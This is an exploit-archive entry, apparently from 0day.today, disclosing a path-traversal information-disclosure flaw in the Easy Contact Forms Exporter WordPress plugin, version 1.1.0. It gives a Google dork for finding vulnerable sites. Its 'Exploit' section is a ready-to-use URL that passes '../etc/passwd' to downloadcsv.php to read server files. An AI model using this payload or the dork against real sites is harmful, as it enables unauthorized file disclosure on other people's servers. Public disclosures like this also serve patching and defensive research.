id: 18484
date: 06/07/2012
title: ordpress Plugins - Easy Contact Forms Export Information Disclosure Vulnerability
author: Sammy FORGIT
cves: 

##################################################
# Description : Wordpress Plugins - Easy Contact Forms Export Information Disclosure Vulnerability
# Version : 1.1.0
# Link : http://wordpress.org/extend/easy-contact-forms-exporter/
# Plugins : http://downloads.wordpress.org/plugin/easy-contact-forms-exporter.zip
# Google Dork : inurl:/wp-content/plugins/easy-contact-forms-exporter/
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################

Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/easy-contact-forms-exporter/downloadcsv.php?file=../etc/passwd



#  0day.today [2023-03-22]  #